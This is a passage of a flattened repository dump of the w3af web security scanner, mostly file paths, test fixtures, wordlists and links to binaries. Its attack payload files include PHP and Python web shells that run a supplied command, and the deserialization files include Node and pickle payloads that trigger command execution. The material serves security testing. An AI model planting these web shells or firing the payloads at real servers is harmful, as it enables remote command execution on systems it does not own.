software released into the public domain. Anyone is free to copy, 6 | # modify, publish, use, compile, sell, or distribute this software, 7 | # either in source code form or as a compiled binary, for any purpose, 8 | # commercial or non-commercial, and by any means. 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/txt/wordlist.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/txt/wordlist.zip -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/README.txt: -------------------------------------------------------------------------------- 1 | Binary files in this folder are data files used by sqlmap on the target 2 | system, but not executed on the system running sqlmap. They are licensed 3 | under the terms of the GNU Lesser General Public License and their source 4 | code is available on https://github.com/sqlmapproject/udfhack. 5 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/mysql/linux/32/lib_mysqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/mysql/linux/32/lib_mysqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/mysql/windows/32/lib_mysqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/mysql/windows/32/lib_mysqludf_sys.dll_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/mysql/windows/64/lib_mysqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/db/sqlmap/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/waf/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/waf/proventia.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | __product__ = "Proventia Web Application Security (IBM)" 9 | 10 | def detect(get_page): 11 | page, _, _ = get_page() 12 | if page is None: 13 | return False 14 | page, _, _ = get_page(url="/Admin_Files/") 15 | return page is None 16 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/waf/webappsecure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | __product__ = "webApp.secure (webScurity)" 9 | 10 | def detect(get_page): 11 | _, _, code = get_page() 12 | if code == 403: 13 | return False 14 | _, _, code = get_page(get="nx=@@") 15 | return code == 403 16 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/xml/banner/oracle.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/xml/banner/sharepoint.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /w3af/plugins/attack/db/sqlmap/xml/banner/x-aspnet-version.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /w3af/plugins/attack/payloads/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/payloads/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/attack/payloads/code/code.php: -------------------------------------------------------------------------------- 1 | echo strrev("15825b40c6dace2a"); 2 | if ( '__CMD_TO_RUN__' !== '' ){ 3 | $ar = array(); $ou = ""; 4 | exec('__CMD_TO_RUN__', $ar); 5 | foreach ($ar as $k=>$v){$ou = $ou . "$v\n";} 6 | echo base64_encode($ou); 7 | } 8 | echo strrev("7cf5d4ab8ed434d5"); 9 | 10 | -------------------------------------------------------------------------------- /w3af/plugins/attack/payloads/code/code.py: -------------------------------------------------------------------------------- 1 | import sys,commands,base64 2 | sys.stdout.write('15825b40c6dace2a'[::-1]) 3 | if '__CMD_TO_RUN__': 4 | sys.stdout.write(base64.b64encode(commands.getoutput('__CMD_TO_RUN__'))) 5 | sys.stdout.write('7cf5d4ab8ed434d5'[::-1]) 6 | sys.stdout.flush() -------------------------------------------------------------------------------- /w3af/plugins/attack/payloads/decorators/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/payloads/decorators/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/attack/payloads/misc/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/payloads/misc/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/attack/payloads/misc/file_crawler.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/payloads/misc/file_crawler.py -------------------------------------------------------------------------------- /w3af/plugins/attack/payloads/payloads/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/payloads/payloads/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/attack/payloads/payloads/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/payloads/payloads/tests/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/attack/payloads/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/payloads/tests/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/attack/payloads/webshell/webshell.php: -------------------------------------------------------------------------------- 1 | $v){$ou = $ou . "$v\n";} 7 | echo base64_encode($ou); 8 | } 9 | echo strrev("7cf5d4ab8ed434d5"); 10 | ?> 11 | -------------------------------------------------------------------------------- /w3af/plugins/attack/payloads/webshell/webshell.py: -------------------------------------------------------------------------------- 1 | import commands 2 | 3 | 4 | def index(req, cmd): 5 | if not cmd: 6 | print "15825b40c6dace2a" + "7cf5d4ab8ed434d5" 7 | else: 8 | return commands.getoutput(cmd) 9 | -------------------------------------------------------------------------------- /w3af/plugins/audit/deserialization/java/send-payload.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | curl -H "Content-Type:plain/text" "http://localhost:8222/suffer" -d "$*" 3 | echo "" 4 | exit 0 5 | -------------------------------------------------------------------------------- /w3af/plugins/audit/deserialization/node/node-serialize.json: -------------------------------------------------------------------------------- 1 | { 2 | "1": {"payload": "eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7XG4gICAgICAgIHJlcXVpcmUoJ2NoaWxkX3Byb2Nlc3MnKS5leGVjU3luYygnc2xlZXAgMScpO1xuICAgIH0oKSJ9", 3 | "offsets": [84]}, 4 | "2": {"payload": "eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7XG4gICAgICAgIHJlcXVpcmUoJ2NoaWxkX3Byb2Nlc3MnKS5leGVjU3luYygnc2xlZXAgMjInKTtcbiAgICB9KCkifQ==", 5 | "offsets": [84]} 6 | } -------------------------------------------------------------------------------- /w3af/plugins/audit/deserialization/node/payload-generator.js: -------------------------------------------------------------------------------- 1 | var y = { 2 | rce : function(){ 3 | require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); 4 | }, 5 | } 6 | var serialize = require('node-serialize'); 7 | console.log("Serialized: \n" + serialize.serialize(y)); 8 | -------------------------------------------------------------------------------- /w3af/plugins/audit/deserialization/python/README.md: -------------------------------------------------------------------------------- 1 | See the generator.py file 2 | -------------------------------------------------------------------------------- /w3af/plugins/audit/deserialization/python/pickle.json: -------------------------------------------------------------------------------- 1 | { 2 | "1": {"payload": "Y3RpbWUKc2xlZXAKcDEKKEkxCnRwMgpScDMKLg==", 3 | "offsets": [17]}, 4 | "2": {"payload": "Y3RpbWUKc2xlZXAKcDEKKEkyMgp0cDIKUnAzCi4=", 5 | "offsets": [17]} 6 | } -------------------------------------------------------------------------------- /w3af/plugins/auth/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | def get_long_description(): 4 | """ 5 | :return: The description for the plugin type. 6 | """ 7 | return """Auth plugins make possible to scan authorization protected web applications. 8 | They make login action in the beginning of the scan, logout - in the end 9 | and check current session action regularly.""" 10 | -------------------------------------------------------------------------------- /w3af/plugins/crawl/content_negotiation/common_filenames.db: -------------------------------------------------------------------------------- 1 | admin 2 | backup 3 | back 4 | debug 5 | test 6 | testing 7 | -------------------------------------------------------------------------------- /w3af/plugins/crawl/phpinfo_analysis/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/crawl/phpinfo_analysis/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/crawl/ria_enumerator/common_filenames.db: -------------------------------------------------------------------------------- 1 | site-manifest 2 | site_manifest 3 | sitemanifest 4 | gears_manifest 5 | gears-manifest 6 | gearsmanifest 7 | offline-manifest 8 | offline_manifest 9 | offlinemanifest 10 | gears-config 11 | gears_config 12 | gearsconfig 13 | cache-manifest 14 | cache_manifest 15 | cachemanifest 16 | manifest 17 | filesInCache -------------------------------------------------------------------------------- /w3af/plugins/crawl/spider_man/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/crawl/spider_man/favicon.ico -------------------------------------------------------------------------------- /w3af/plugins/crawl/user_db/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/crawl/user_db/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/crawl/user_db/os.csv: -------------------------------------------------------------------------------- 1 | Debian based distribution,Debian-exim 2 | Debian based distribution,debian-tor 3 | FreeBSD,kmem 4 | -------------------------------------------------------------------------------- /w3af/plugins/crawl/wordnet/wordnet.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/crawl/wordnet/wordnet.zip -------------------------------------------------------------------------------- /w3af/plugins/grep/password_profiling_plugins/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/grep/password_profiling_plugins/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/grep/password_profiling_plugins/tests/test.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/grep/password_profiling_plugins/tests/test.pdf -------------------------------------------------------------------------------- /w3af/plugins/grep/ssndata/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/grep/ssndata/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/grep/user_defined_regex/empty.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/grep/user_defined_regex/empty.txt -------------------------------------------------------------------------------- /w3af/plugins/infrastructure/halberd_helpers/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pablo' 2 | -------------------------------------------------------------------------------- /w3af/plugins/infrastructure/oHmap/BUGS: -------------------------------------------------------------------------------- 1 | KNOWN BUGS 2 | 3 | ====================================================================== 4 | 5 | - if the default page (e.g. index.html) is missing profiles tend to be 6 | way off 7 | 8 | - some requests return NO_RESPONSE message intermittently 9 | - makes long error range type tests somewhat unreliable for some servers 10 | - don't know if this is a problem with my code or the server or 11 | with the connection -------------------------------------------------------------------------------- /w3af/plugins/infrastructure/oHmap/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/infrastructure/oHmap/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/output/html_file/templates/high.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/output/html_file/templates/high.png -------------------------------------------------------------------------------- /w3af/plugins/output/html_file/templates/information.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/output/html_file/templates/information.png -------------------------------------------------------------------------------- /w3af/plugins/output/html_file/templates/low.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/output/html_file/templates/low.png -------------------------------------------------------------------------------- /w3af/plugins/output/html_file/templates/medium.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/output/html_file/templates/medium.png -------------------------------------------------------------------------------- /w3af/plugins/tests/__init__.py: -------------------------------------------------------------------------------- 1 | try: 2 | _('blah') 3 | except: 4 | import __builtin__ 5 | __builtin__.__dict__['_'] = lambda x: x 6 | 7 | 8 | def setUpPackage(): 9 | import __builtin__ 10 | __builtin__.__dict__['_'] = lambda x: x 11 | -------------------------------------------------------------------------------- /w3af/plugins/tests/attack/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/tests/attack/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/tests/audit/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/tests/audit/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/tests/audit/certs/README: -------------------------------------------------------------------------------- 1 | These certificates are used in the test_ssl_certificate.py unittest and 2 | don't have any real value. They simply trigger different states in the 3 | ssl_certificate.py audit plugin. 4 | -------------------------------------------------------------------------------- /w3af/plugins/tests/auth/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/tests/auth/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/tests/bruteforce/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/tests/bruteforce/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/tests/bruteforce/small-passwords.txt: -------------------------------------------------------------------------------- 1 | foo 2 | bar 3 | spam 4 | 123 5 | 1234 6 | 12345 7 | 123456 8 | eggs 9 | admin 10 | 000000 11 | 00000 12 | 0000 13 | 000 14 | love 15 | 16 | -------------------------------------------------------------------------------- /w3af/plugins/tests/bruteforce/small-users-negative.txt: -------------------------------------------------------------------------------- 1 | andres 2 | pablo 3 | -------------------------------------------------------------------------------- /w3af/plugins/tests/bruteforce/small-users-positive.txt: -------------------------------------------------------------------------------- 1 | pedro 2 | admin 3 | -------------------------------------------------------------------------------- /w3af/plugins/tests/constants/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pablo' 2 | -------------------------------------------------------------------------------- /w3af/plugins/tests/constants/http_responses.py: -------------------------------------------------------------------------------- 1 | APACHE_403_FMT = """ 2 | 3 | 4 | 403 Forbidden 5 | 6 |

Forbidden

7 |

You don't have permission to access %s on this server.

8 |
9 |
Apache/2.2.22 (Ubuntu) Server at %s Port 443
10 | 11 | """ 12 | 13 | 14 | def get_apache_403(path, domain): 15 | return APACHE_403_FMT % (path, domain) -------------------------------------------------------------------------------- /w3af/plugins/tests/crawl/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/tests/crawl/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/tests/crawl/dir_file_bruter/test_dirs_small.db: -------------------------------------------------------------------------------- 1 | plugins 2 | tests 3 | crawl 4 | dir_bruter 5 | setup 6 | header 7 | images 8 | portal 9 | index 10 | whoami 11 | andres 12 | riancho 13 | test 14 | foobar 15 | spameggs 16 | -------------------------------------------------------------------------------- /w3af/plugins/tests/crawl/dir_file_bruter/test_files_small.db: -------------------------------------------------------------------------------- 1 | donotexist.png 2 | donotexist.bmp 3 | donotexist.txt 4 | iamhidden.txt 5 | donotexist.db 6 | donotexist.sqlite3 7 | db.sqlite3 8 | hidden-inside-dir.txt 9 | foobar 10 | -------------------------------------------------------------------------------- /w3af/plugins/tests/crawl/ds_store/DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/tests/crawl/ds_store/DS_Store -------------------------------------------------------------------------------- /w3af/plugins/tests/crawl/find_dvcs/sample-wc.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/tests/crawl/find_dvcs/sample-wc.db -------------------------------------------------------------------------------- /w3af/plugins/tests/crawl/phishtank/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/plugins/tests/crawl/web_diff/123.html: -------------------------------------------------------------------------------- 1 | 123 2 | -------------------------------------------------------------------------------- /w3af/plugins/tests/crawl/web_diff/456.html: -------------------------------------------------------------------------------- 1 | 123 2 | -------------------------------------------------------------------------------- /w3af/plugins/tests/crawl/web_diff/exclude.php: -------------------------------------------------------------------------------- 1 | 789 2 | -------------------------------------------------------------------------------- /w3af/plugins/tests/crawl/web_diff/index.html: -------------------------------------------------------------------------------- 1 | abc 2 | -------------------------------------------------------------------------------- /w3af/plugins/tests/evasion/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/tests/evasion/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/tests/grep/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/tests/grep/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/tests/grep/data/w3af.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/tests/grep/data/w3af.png -------------------------------------------------------------------------------- /w3af/plugins/tests/infrastructure/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/tests/infrastructure/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/tests/mangle/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/tests/mangle/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/tests/output/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/tests/output/__init__.py -------------------------------------------------------------------------------- /w3af/plugins/tests/output/data/0x0b.html: -------------------------------------------------------------------------------- 1 |
2 |

P2

3 |

high-performance solution 4 | 5 | Designed for erosive and aggressive slurries.

6 |
7 | 8 | /etc/passwd 9 | -------------------------------------------------------------------------------- /w3af/plugins/tests/output/data/nsepa32.rpm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/tests/output/data/nsepa32.rpm -------------------------------------------------------------------------------- /w3af/plugins/tests/output/test_console.py: -------------------------------------------------------------------------------- 1 | """ 2 | @see: test_consoleui.py 3 | """ 4 | -------------------------------------------------------------------------------- /w3af/tests/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pablo' 2 | -------------------------------------------------------------------------------- /w3af/tests/helpers/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/tests/helpers/__init__.py -------------------------------------------------------------------------------- /w3af/tests/vuln_sites/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pablo' 2 | -------------------------------------------------------------------------------- /w3af/tests/vuln_sites/utils/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pablo' 2 | -------------------------------------------------------------------------------- /w3af/tests/wavsep.yml: 